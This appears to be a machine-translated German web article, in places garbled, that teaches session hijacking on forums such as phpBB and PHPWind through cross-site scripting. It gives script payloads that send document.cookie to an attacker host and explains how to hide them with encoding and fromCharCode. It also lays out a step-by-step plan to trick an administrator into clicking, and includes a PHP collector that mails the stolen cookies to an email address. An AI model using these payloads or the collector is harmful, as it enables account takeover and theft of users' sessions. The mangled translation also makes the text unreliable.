Heim > Artikel > Web-Frontend > XSS-Angriff, der die JavaScript-Ausführung beim Cookie-Spoofing verbirgt
Wenn Sie zum Beispiel einen Ort finden, an dem XSS möglich ist:
<script>Alarm (wird einfach angezeigt, egal was passiert)</script>
Besorgen Sie sich eine Datei, die Cookies stiehlt selbst.
Der Zweck besteht darin, anderen Zuschauern das Durchsuchen der von uns entworfenen Fallen zu ermöglichen
<script>document.location=http://URL.com/cookie.php?cookie='+escape ( document.cookie) </script>
Mehr dazu muss ich nicht sagen. .
Jetzt reden wir hauptsächlich darüber, wie man die JavaScript-Ausführung verbirgt.
Vielleicht sind Sie es gewohnt, jeden Tag auf milw0rm.com zu gehen, um EXP zu sehen.
Jedes Mal, wenn die EXP der XSS-Schwachstelle veröffentlicht wird, wenn wir sie ausnutzen.
kann aber keine Informationen speichern, woran liegt das? .
Große Foren wie Magic und PHPBB weisen alle XSS-Schwachstellen auf.
Das habe ich dir gegeben
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script> ;<br><br> zeigt Javascript-Fehler an. <br><br>Es gibt zwei Lösungen. Wir können externe sensible Informationen in Unicode kodieren. <br><br>Geben Sie eine URL an: http://www.mikezilla.com/exp0012.html.<br><br> Das ist wie es durch Kodierung ist: <br><script>eval(location.href="http://www.php1.cn/"><br>Wenn das oben genannte nicht funktioniert, verwenden Sie die zweite Methode <br> <br>Die Auswertungsfunktion in Javascript vonCharCode<br><br>Wie oben erwähnt, können einige Websites mit Unicode kodiert werden<br><br>Zum Beispiel ist die kodierte Zahl 104, 116, 116, 112 HTTP<br><br>Wenn das Forum andere Editoren verwendet, z. B. den von PHPWind verwendeten WYSIWYG-Editor <br><br>, wird die direkte Eingabe von http://url.com auf jeden Fall angezeigt <br><br> Dann werden wir es tun Ändern Sie es basierend auf dem Format der Editor-URL.<br><br>Zum Beispiel ist die Website, die COOKIE stiehlt, http://www.URL.com<br><br>Wir werden dies tun<br>http: //www.url.com<br><br>Natürlich können Sie den angezeigten Teil durch attraktive Informationen ersetzen, um das Management und die Klicks zu betrügen <br><br>Mit ein wenig Social Engineering haben Sie jetzt die ursprüngliche Idee fertiggestellt. Machen wir es<br><br>Schritt 1: Der Manager sah die von uns erstellte Falle und klickte darauf<br><br>Schritt 2: Das Javascript wurde erfolgreich ausgeführt: Gestohlene COOKIE-Datei erstellt, um Cookie zu stehlen <br><br> Schritt 4: Wir können nicht so dumm sein, dass die URL-Verbindung reiner Text ist, und die URL mit Unicode verschlüsseln (hier heißt es üblicherweise verschlüsselt) http://mikezilla.com/exp0012.html<br><br>Schritt 5: Die abgefangenen Cookie-Informationen liegen natürlich nicht im Klartext vor. Wir müssen nur den Firefox-Cookie-Editor verwenden<br>, um den COOKIE zu ersetzen, oder andere Tools wie CookieEditor verwenden Persönlicher Vorschlag: Cookies zu stehlen bedeutet nicht unbedingt, Speicherplatz zum Sammeln von Cookie-Informationen zu nutzen<br>Zum Beispiel sieht das Erstellen eines Postfachs zum Sammeln dieser Informationen so aus<br><?<br/><br/>mail("hackeroo@hotmail.com ","Keksmonster",$_REQUEST[cookie]);<br/><br/>?><br><html><br><script>document.location=http://www.URL.com /'</script>